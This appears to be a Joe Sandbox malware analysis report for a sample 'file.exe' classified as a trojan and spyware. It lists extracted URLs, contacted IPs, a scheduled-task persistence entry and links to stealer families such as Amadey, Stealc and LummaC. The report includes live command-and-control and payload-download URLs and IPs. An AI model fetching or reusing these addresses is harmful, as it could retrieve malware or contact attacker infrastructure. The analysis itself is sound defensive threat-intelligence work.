https://duckduckgo.com/ac/?q=	file.exe, 00000000.00000003.2347256010.00000000006EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2438637160.000000002339F000.00000004.00000020.00020000.00000000.sdmp, AEGHJKJK.0.dr, JJEGCBGI.0.dr, Web Data.12.dr	false		high
http://www.broofa.com	chromecache_569.8.dr	false		high
https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline	370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	false		high
https://ntp.msn.com/0	000003.log8.12.dr	false		high
https://ntp.msn.com/_default	QuotaManager.12.dr	false		high
http://185.215.113.206/68b591d6548ec281/mozglue.dllw3	file.exe, 00000000.00000002.2662001774.0000000000692000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.last.fm/	370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	false		high
https://deff.nelreports.net/api/report?cat=msn	2cc80dabc69f58b6_0.12.dr	false		high
https://ntp.msn.cn/edge/ntp	2cc80dabc69f58b6_1.12.dr	false		high
https://sb.scorecardresearch.com/	2cc80dabc69f58b6_1.12.dr	false		high
https://deff.nelreports.net/api/report	Reporting and NEL.13.dr	false		high
http://31.41.244.11/files/random.exe1	skotes.exe, 0000001C.00000002.3388611571.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://docs.google.com/	manifest.json0.12.dr	false		high
https://www.youtube.com	370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	false		high
http://31.41.244.11/	skotes.exe, 0000001C.00000002.3388611571.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://deff.nelreports.net/api/report?cat=msnw	Reporting and NEL.13.dr	false		high
https://www.instagram.com	370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	false		high
https://web.skype.com/?browsername=edge_canary_shoreline	370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	false		high
https://drive.google.com/	manifest.json0.12.dr	false		high
https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1	370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	false		high
https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2	370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	false		high
https://www.messenger.com	370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	false		high
https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge	370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	false		high
https://outlook.office.com/mail/compose?isExtension=true	370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	false		high
https://unitedstates4.ss.wd.microsoft.us/	edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.12.dr	false		high
https://i.y.qq.com/n2/m/index.html	370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	false		high
https://www.deezer.com/	370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	false		high
https://web.telegram.org/	370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	false		high
http://www.mozilla.com/en-US/blocklist/	file.exe, 00000000.00000002.2692174444.000000006FD5D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	false		high
https://mozilla.org0/	freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	false		high
https://drive-daily-2.corp.google.com/	manifest.json0.12.dr	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	KKKEBKJJDGHCBGCAAKEH.0.dr	false		high
https://drive-daily-4.corp.google.com/	manifest.json0.12.dr	false		high
https://vibe.naver.com/today	370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	false		high
http://185.215.113.206/c4becf79229cb002.phpZd	file.exe, 00000000.00000002.2687486247.0000000023400000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://srtb.msn.com/	2cc80dabc69f58b6_1.12.dr	false		high
https://unitedstates1.ss.wd.microsoft.us/	edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.12.dr	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000000.00000003.2347256010.00000000006EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2438637160.000000002339F000.00000004.00000020.00020000.00000000.sdmp, AEGHJKJK.0.dr, JJEGCBGI.0.dr, Web Data.12.dr	false		high
https://assets.msn.com	74628cf2-426f-44c9-9415-16f2cf6683fe.tmp.13.dr	false		high
https://www.ecosia.org/newtab/	file.exe, 00000000.00000003.2347256010.00000000006EF000.00000004.00000020.00020000.00000000.sdmp, JJEGCBGI.0.dr	false		high
https://drive-daily-1.corp.google.com/	manifest.json0.12.dr	false		high
https://excel.new?from=EdgeM365Shoreline	370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	KJJJDHDGDAAKECAKJDAEGCBKEH.0.dr	false		high
http://185.215.113.206ngineer	file.exe, 00000000.00000002.2662760280.0000000000FE5000.00000040.00000001.01000000.00000003.sdmp	false		high
https://drive-daily-5.corp.google.com/	manifest.json0.12.dr	false		high
http://185.215.113.206/c4becf79229cb002.php~Q=	file.exe, 00000000.00000002.2662001774.0000000000692000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://play.google.com/log?format=json&hasfast=true	chromecache_569.8.dr	false		high
https://www.google.com/chrome	content.js.12.dr, content_new.js.12.dr	false		high
https://www.tiktok.com/	370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	false		high
https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt	KJJJDHDGDAAKECAKJDAEGCBKEH.0.dr	false		high
https://www.msn.com/web-notification-icon-light.png	2cc80dabc69f58b6_1.12.dr	false		high
http://31.41.244.11/files/random.exe3b31	skotes.exe, 0000001C.00000002.3388611571.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://chromewebstore.google.com/	manifest.json.12.dr	false		high
http://185.215.113.206/68b591d6548ec281/nss3.dllm0	file.exe, 00000000.00000002.2662001774.0000000000692000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://31.41.244.11/files/random.exephp	skotes.exe, 0000001C.00000002.3388611571.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://drive-preprod.corp.google.com/	manifest.json0.12.dr	false		high
https://srtb.msn.cn/	2cc80dabc69f58b6_1.12.dr	false		high
https://msn.comXIDv10	Cookies.13.dr	false		high
https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2	370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	false		high
http://31.41.244.11/files/random.exe	skotes.exe, 0000001C.00000002.3388611571.0000000000E9B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000001C.00000002.3388611571.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000001C.00000002.3388611571.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1	370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	false		high
https://chrome.google.com/webstore/	manifest.json.12.dr	false		high
https://y.music.163.com/m/	370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	false		high
http://185.215.113.206/68b591d6548ec281/msvcp140.dllJ	file.exe, 00000000.00000002.2662001774.0000000000677000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://unitedstates2.ss.wd.microsoft.us/	edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.12.dr	false		high
http://185.215.113.206/c4becf79229cb002.phpSd	file.exe, 00000000.00000002.2687486247.0000000023400000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://bard.google.com/	370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	false		high
https://assets.msn.cn/resolver/	2cc80dabc69f58b6_1.12.dr	false		high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta	file.exe, 00000000.00000002.2687486247.00000000233F3000.00000004.00000020.00020000.00000000.sdmp, KKKEBKJJDGHCBGCAAKEH.0.dr	false		high
https://browser.events.data.msn.com/	2cc80dabc69f58b6_1.12.dr	false		high
https://web.whatsapp.com	370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	false		high
http://31.41.244.11/files/random.exe06ncoded	skotes.exe, 0000001C.00000002.3388611571.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.43/Zu7JuNko/index.phpY	skotes.exe, 0000001C.00000002.3388611571.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://31.41.244.11/A	skotes.exe, 0000001C.00000002.3388611571.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://m.kugou.com/	370dca46-4895-4c1e-87d4-1605288c47e8.tmp.12.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.215.113.43	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
13.107.246.63	s-part-0035.t-0009.t-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
13.107.246.40	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
23.44.201.18	unknown	United States	20940	AKAMAI-ASN1EU	false
23.219.161.132	unknown	United States	20940	AKAMAI-ASN1EU	false
162.159.61.3	chrome.cloudflare-dns.com	United States	13335	CLOUDFLARENETUS	false
2.16.158.75	unknown	European Union	20940	AKAMAI-ASN1EU	false
23.219.161.135	unknown	United States	20940	AKAMAI-ASN1EU	false
204.79.197.219	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
172.64.41.3	unknown	United States	13335	CLOUDFLARENETUS	false
2.16.158.35	unknown	European Union	20940	AKAMAI-ASN1EU	false
31.41.244.11	unknown	Russian Federation	61974	AEROEXPRESS-ASRU	false
172.217.17.78	plus.l.google.com	United States	15169	GOOGLEUS	false
23.33.40.146	unknown	United States	20940	AKAMAI-ASN1EU	false
23.209.72.40	unknown	United States	20940	AKAMAI-ASN1EU	false
94.245.104.56	ssl.bingadsedgeextension-prod-europe.azurewebsites.net	United Kingdom	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
142.250.181.100	www.google.com	United States	15169	GOOGLEUS	false
18.238.49.124	unknown	United States	16509	AMAZON-02US	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
23.44.201.5	unknown	United States	20940	AKAMAI-ASN1EU	false
104.117.182.56	unknown	United States	20940	AKAMAI-ASN1EU	false
185.215.113.206	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
20.75.60.91	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
142.250.181.97	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false
13.89.179.8	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false

Private

IP
192.168.2.6
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1561352
Start date and time:	2024-11-23 07:08:13 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 3s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	30
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@75/291@27/28
EGA Information:	Successful, ratio: 25%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 93.184.221.240, 172.217.21.35, 74.125.205.84, 172.217.19.238, 34.104.35.123, 142.250.181.99, 142.250.181.106, 142.250.181.138, 172.217.17.42, 142.250.181.42, 172.217.19.234, 172.217.17.74, 142.250.181.74, 172.217.19.202, 172.217.21.42, 142.250.181.10, 216.58.208.234, 172.217.19.170, 40.69.42.241, 13.107.42.16, 204.79.197.203, 204.79.197.239, 13.107.21.239, 13.107.6.158, 172.165.61.93, 2.19.198.56, 23.32.238.138, 172.165.69.228, 23.32.238.219, 23.32.238.168, 23.32.238.227, 23.32.238.226, 23.32.238.192, 23.32.238.217, 23.32.238.240, 23.32.238.234, 23.32.238.187, 2.16.158.187, 2.16.158.179, 2.16.158.184, 2.16.158.26, 2.16.158.170, 2.16.158.186, 2.16.158.185, 2.16.158.96, 2.16.158.169, 95.100.135.121, 95.100.135.122, 95.100.135.65, 95.100.135.105, 95.100.135.107, 95.100.135.99, 95.100.135.73, 95.100.135.130, 95.100.135.57, 13.74.129.1, 204.79.197.237, 13.107.21.237, 199.232.210.172, 142.250.65.195, 142.251.41.3, 172.217.165.131, 142.251.40.131, 20.110.205.119
Excluded domains from analysis (whitelisted): prod-agic-us-3.uksouth.cloudapp.azure.com, nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, data-edge.smartscreen.microsoft.com, img-s-msn-com.akamaized.net, tse1.mm.bing.net, clientservices.googleapis.com, edgeassetservice.afd.azureedge.net, g.bing.com, prod-agic-us-2.uksouth.cloudapp.azure.com, clients2.google.com, e86303.dscx.akamaiedge.net, config-edge-skype.l-0007.l-msedge.net, www.gstatic.com, l-0007.l-msedge.net, e28578.d.akamaiedge.net, star.b.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, www.bing.com, assets.msn.com.edgekey.net, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, c-bing-com.dual-a-0034.a-msedge.net, ogads-pa.googleapis.com, prod-atm-wds-edge.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, a1834.dscg2.akamai.net, edgedl.me.gvt1.com, c.bing.com, edgeassetservice.azureedge.net, clients.l.google.com, config.edge.skype.com.trafficmanager.net, c-msn-com-nsatc.trafficmanager.
Execution Graph export aborted for target DocumentsJDAFHCGIJE.exe, PID 9076 because it is empty
Execution Graph export aborted for target file.exe, PID 2128 because there are no executed function
Execution Graph export aborted for target skotes.exe, PID 8512 because there are no executed function
HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteFile calls found.
Report size getting too big, too many NtWriteVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
01:09:39	API Interceptor	149x Sleep call for process: file.exe modified
01:11:01	API Interceptor	114x Sleep call for process: skotes.exe modified
07:10:01	Task Scheduler	Run new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.43	file.exe	Get hash	malicious	Amadey, Cryptbot	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
13.107.246.63	file.exe	Get hash	malicious	LummaC Stealer	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC Stealer	Browse
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC Stealer	Browse
	file.exe	Get hash	malicious	LummaC Stealer	Browse
	file.exe	Get hash	malicious	LummaC Stealer	Browse
	file.exe	Get hash	malicious	LummaC Stealer	Browse
	https://docs.google.com/drawings/d/15fSe2159qP21C2NrS3K5cgcsyPwNINvux6xIUCvvgBU/preview?pli=1AmyVazquez-brian.nester@lvhn.org	Get hash	malicious	HTMLPhisher	Browse
13.107.246.40	Payment Transfer Receipt.shtml	Get hash	malicious	HTMLPhisher	Browse	www.aib.gov.uk/
	NEW ORDER.xls	Get hash	malicious	Unknown	Browse	2s.gg/3zs
	PO_OCF 408.xls	Get hash	malicious	Unknown	Browse	2s.gg/42Q
	06836722_218 Aluplast.docx.doc	Get hash	malicious	Unknown	Browse	2s.gg/3zk
	Quotation.xls	Get hash	malicious	Unknown	Browse	2s.gg/3zM

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
chrome.cloudflare-dns.com	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	162.159.61.3
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.64.41.3
	ivySCI-5.6.3.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	162.159.61.3
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	162.159.61.3
	file.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	MayitaV16.exe	Get hash	malicious	Unknown	Browse	162.159.61.3
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.64.41.3
ssl.bingadsedgeextension-prod-europe.azurewebsites.net	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	Unknown	Browse	94.245.104.56
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	Amadey, XWorm	Browse	94.245.104.56
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	94.245.104.56
fg.microsoft.map.fastly.net	phish_alert_sp2_2.0.0.0 (6).eml	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://storage.googleapis.com/windows_bucket1/turbo/download/TurboVPN_setup.exe	Get hash	malicious	Unknown	Browse	199.232.210.172
	ap4pkLeaVp.exe	Get hash	malicious	Unknown	Browse	199.232.210.172
	setup.exe	Get hash	malicious	Unknown	Browse	199.232.210.172
	vs_BuildTools.zip	Get hash	malicious	Unknown	Browse	199.232.210.172
	XYrLOQoLE4.exe	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://r20.rs6.net/tn.jsp?t=ujqgb8abb.0.0.zumspjcab.0&id=preview&r=3&p=http%3A%2F%2Ffiles.constantcontact.com%2F99239f29001%2F765a22db-b453-4315-a344-dc2294500069.pdf	Get hash	malicious	Unknown	Browse	199.232.214.172
	SecuriteInfo.com.Win64.Malware-gen.31578.13203.exe	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://ig-leaks.github.io/insta_chat/instagram/	Get hash	malicious	Unknown	Browse	199.232.210.172
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	199.232.214.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Cryptbot	Browse	185.215.113.43
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
MICROSOFT-CORP-MSN-AS-BLOCKUS	file.exe	Get hash	malicious	LummaC Stealer	Browse	13.107.246.63
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	20.96.153.111
	file.exe	Get hash	malicious	LummaC Stealer	Browse	13.107.246.63
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse	13.107.246.63
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	LummaC Stealer	Browse	13.107.246.63
	file.exe	Get hash	malicious	PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	23.101.168.44
	file.exe	Get hash	malicious	LummaC Stealer	Browse	13.107.246.63
	file.exe	Get hash	malicious	LummaC Stealer	Browse	13.107.246.63
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	52.228.161.161
AKAMAI-ASN1EU	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	23.209.72.21
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	23.44.136.149
	file.exe	Get hash	malicious	PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	23.200.3.13
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	104.117.182.18
	PO #09465610_GQ 003745_SO-242000846.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	172.234.222.143
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	104.117.182.72
	sh4.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	2.22.112.167
	https://app.typeset.com/play/G4WZ1	Get hash	malicious	HTMLPhisher	Browse	2.16.34.8
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	23.44.203.77
	file.exe	Get hash	malicious	Unknown	Browse	104.117.182.59
MICROSOFT-CORP-MSN-AS-BLOCKUS	file.exe	Get hash	malicious	LummaC Stealer	Browse	13.107.246.63
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	20.96.153.111
	file.exe	Get hash	malicious	LummaC Stealer	Browse	13.107.246.63
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse	13.107.246.63
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	LummaC Stealer	Browse	13.107.246.63
	file.exe	Get hash	malicious	PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	23.101.168.44
	file.exe	Get hash	malicious	LummaC Stealer	Browse	13.107.246.63
	file.exe	Get hash	malicious	LummaC Stealer	Browse	13.107.246.63
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	52.228.161.161

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.202.163.200 52.149.20.212 13.107.246.63 20.190.147.12 23.218.208.109
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.202.163.200 52.149.20.212 13.107.246.63 20.190.147.12 23.218.208.109
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.202.163.200 52.149.20.212 13.107.246.63 20.190.147.12 23.218.208.109
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse	172.202.163.200 52.149.20.212 13.107.246.63 20.190.147.12 23.218.208.109
	http://ppc-overwatch.com	Get hash	malicious	Unknown	Browse	172.202.163.200 52.149.20.212 13.107.246.63 20.190.147.12 23.218.208.109
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.202.163.200 52.149.20.212 13.107.246.63 20.190.147.12 23.218.208.109
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.202.163.200 52.149.20.212 13.107.246.63 20.190.147.12 23.218.208.109
	Yssr_Receipt.html	Get hash	malicious	Unknown	Browse	172.202.163.200 52.149.20.212 13.107.246.63 20.190.147.12 23.218.208.109
	file.exe	Get hash	malicious	PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	172.202.163.200 52.149.20.212 13.107.246.63 20.190.147.12 23.218.208.109
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.202.163.200 52.149.20.212 13.107.246.63 20.190.147.12 23.218.208.109
6271f898ce5be7dd52b0fc260d0662b3	file.exe	Get hash	malicious	LummaC Stealer	Browse	150.171.27.10 2.16.158.90 20.223.36.55 150.171.28.10
	file.exe	Get hash	malicious	LummaC Stealer	Browse	150.171.27.10 2.16.158.90 20.223.36.55 150.171.28.10
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	150.171.27.10 2.16.158.90 20.223.36.55 150.171.28.10
	https://clearview-ps.inwise.net/Page_11-21-2024_1	Get hash	malicious	HTMLPhisher	Browse	150.171.27.10 2.16.158.90 20.223.36.55 150.171.28.10
	https://www.cinehub.click/anus	Get hash	malicious	Unknown	Browse	150.171.27.10 2.16.158.90 20.223.36.55 150.171.28.10
	https://novelalert.cloudaccess.host/wp-admin/includes/contactamende/	Get hash	malicious	Unknown	Browse	150.171.27.10 2.16.158.90 20.223.36.55 150.171.28.10
	https://insights.zohorecruit.com/ck1/2d6f.390d3f0/70932e40-a754-11ef-acd6-525400d4bb1c/c4b396bcef628ee60a3903dd64a571f46a43eb4a/2?e=AP6yJbny%2BojaTRJMo4YN29y4982EEh70QglqvV8aiCoCwftyNixblJXLnLCBIbU9pdrCb4rbSvPbWtRnPycgQw%3D%3D	Get hash	malicious	Unknown	Browse	150.171.27.10 2.16.158.90 20.223.36.55 150.171.28.10
	file.exe	Get hash	malicious	LummaC	Browse	150.171.27.10 2.16.158.90 20.223.36.55 150.171.28.10
	http://amz-account-unlock-dashboard4.duckdns.org	Get hash	malicious	Unknown	Browse	150.171.27.10 2.16.158.90 20.223.36.55 150.171.28.10
	file.exe	Get hash	malicious	LummaC	Browse	150.171.27.10 2.16.158.90 20.223.36.55 150.171.28.10
3b5074b1b5d032e5620f69f9f700ff0e	17323410655ab7b4ebaf9794a98546bfa9f8606c523f625a9e251d1f6b244b39e491609f0a676.dat-decoded.exe	Get hash	malicious	XWorm	Browse	20.198.118.190
	file.exe	Get hash	malicious	LummaC Stealer	Browse	20.198.118.190
